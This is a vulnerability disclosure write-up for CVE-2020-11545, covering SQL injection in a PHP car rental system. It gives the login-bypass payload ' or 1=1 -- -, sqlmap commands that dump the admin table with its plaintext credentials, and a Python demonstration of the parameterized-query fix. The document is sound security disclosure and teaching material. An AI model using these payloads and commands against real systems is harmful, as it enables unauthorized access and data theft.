CVE-2020-11545

Project Worlds Official Car Rental System 1 is vulnerable to multiple SQL injection issues, as demonstrated below.

+-------------+--------------+
| Parameter   | Filename     |
+-------------+--------------+
| email, pass | account.php  |
| uname, pass | login.php    |
| id          | book_car.php |
+-------------+--------------+

Vulnerable parameters for the files.

Impact: These vulnerabilities allow an attacker to dump the MySQL database and to bypass the login authentication prompt.


Discovering the Vulnerabilities

I installed the project on my Ubuntu VM using Apache2 and MySQL. There are two different login pages depending on the type of user, customer or administrator: customers log in via account.php and administrators via login.php. Static code analysis showed that user input is not sanitized; instead, it is used directly in the query sent to the MySQL database.

I further analyzed the web application and saw a potentially vulnerable URL on book_car.php. I intercepted the GET request and saved it to a file, which I could then import into sqlmap for further testing.

Verifying the Vulnerabilities

account.php

account.php vulnerable query statement

Payload: ' or 1=1 -- -

Failed login with invalid credentials
email parameter injection
pass parameter injection

login.php

login.php vulnerable query statement

Payload: ' or 1=1 -- -

Failed login with invalid credentials
uname parameter injection
pass parameter injection
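To show why the ' or 1=1 -- - payload bypasses both login forms, here is an added example (not the project's code; the real application is PHP with MySQL) that rebuilds the dumped admin table in an in-memory sqlite3 database and runs the same login check twice: once with the request values spliced into the query string, as the static analysis found, and once with bound parameters. The table layout and credentials mirror the sqlmap dump below; the payload and the "x" password are constructed inputs.

```python
import sqlite3

# Constructed stand-in for the 'admin' table seen in the sqlmap dump
# (admin_id, pass, uname). The real app is PHP + MySQL; this in-memory
# sqlite3 copy is only here so the comparison runs offline.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admin (admin_id INTEGER, pass TEXT, uname TEXT)")
    conn.execute("INSERT INTO admin VALUES (1, 'admin', 'admin')")
    return conn

# Vulnerable pattern: request values are concatenated straight into the SQL,
# so a quote in the input closes the literal and '--' comments out the rest.
def login_vulnerable(conn, uname, password):
    query = (
        "SELECT uname FROM admin WHERE uname='" + uname
        + "' AND pass='" + password + "'"
    )
    row = conn.execute(query).fetchone()
    return row[0] if row else None

# Hardened pattern: placeholders make the driver pass the values as data, so
# quotes and comment sequences in the input are never parsed as SQL.
# (Plaintext password storage, as the dump shows, is a separate defect:
# the stored value should be a salted password hash.)
def login_safe(conn, uname, password):
    row = conn.execute(
        "SELECT uname FROM admin WHERE uname=? AND pass=?", (uname, password)
    ).fetchone()
    return row[0] if row else None

PAYLOAD = "' or 1=1 -- -"   # payload used in the verification section

def compare(payload=PAYLOAD):
    conn = make_db()
    return {
        "vulnerable": login_vulnerable(conn, payload, "x"),  # 'admin'
        "safe": login_safe(conn, payload, "x"),              # None
        "valid_safe": login_safe(conn, "admin", "admin"),    # 'admin'
    }

if __name__ == "__main__":
    print(compare())
```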
book_car.php

book_car.php vulnerable query statement

I intercepted the GET request that lists the details of a car and saved it to a file. I then used sqlmap to test it for vulnerabilities.

# URL: /book_car.php?id=1
$ sqlmap -r <book_car_request> -o

sqlmap discovering the time-based blind injection

We are able to use sqlmap to enumerate the database further:

$ sqlmap -r <book_car_request> --current-db
[...]
[11:58:47] [INFO] fetching current database
current database: 'cars'
$ sqlmap -r <book_car_request> -D cars --tables
[...]
Database: cars
[5 tables]
+---------+
| admin   |
| cars    |
| client  |
| hire    |
| message |
+---------+
$ sqlmap -r <book_car_request> -D cars -T admin --dump
[...]
Database: cars
Table: admin
[1 entry]
+----------+-------+-------+
| admin_id | pass  | uname |
+----------+-------+-------+
| 1        | admin | admin |
+----------+-------+-------+
